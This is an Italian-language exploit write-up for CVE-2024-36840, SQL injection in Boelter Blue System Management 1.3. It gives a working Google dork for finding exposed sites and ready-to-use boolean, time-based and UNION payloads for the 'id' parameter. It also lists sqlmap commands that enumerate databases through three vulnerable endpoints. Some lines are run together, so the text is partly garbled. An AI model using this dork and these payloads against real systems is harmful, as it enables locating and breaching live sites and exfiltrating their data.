
# Exploit per: CVE-2024-36840: Vulnerabilità di SQL Injection nel Boelter Blue System Management (Versione 1.3)
Titolo dell'Exploit: Vulnerabilità di SQL Injection in Boelter Blue System Management (versione 1.3)
Google Dork Originale: inurl:"Powered by Boelter Blue" (non ha funzionato (zero url nella ricerca))
Google Dork di Theexploiters: intext:"Powered by Boelter Blue" (funzionante)
Data: 2024-06-04
Autore dell'Exploit: CBKB (DeadlyData, R4d1x)
Homepage del Venditore: Boelter Blue
Link del Software: Google Play Store
Versione: 1.3
Testato su: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
CVE: CVE-2024-36840
Sono state identificate multiple vulnerabilità di SQL Injection in Boelter Blue System Management (versione 1.3). Queste vulnerabilità consentono agli attaccanti di iniettare ed eseguire comandi SQL arbitrari attraverso vari parametri. Uno sfruttamento riuscito può comportare accesso non autorizzato, esfiltrazione di dati e potenziali compromissioni di account.
Parametro: id (GET)
id=10071 AND 4036=4036Tipo: Blind basata sul tempo
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Tipo: Query UNION
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs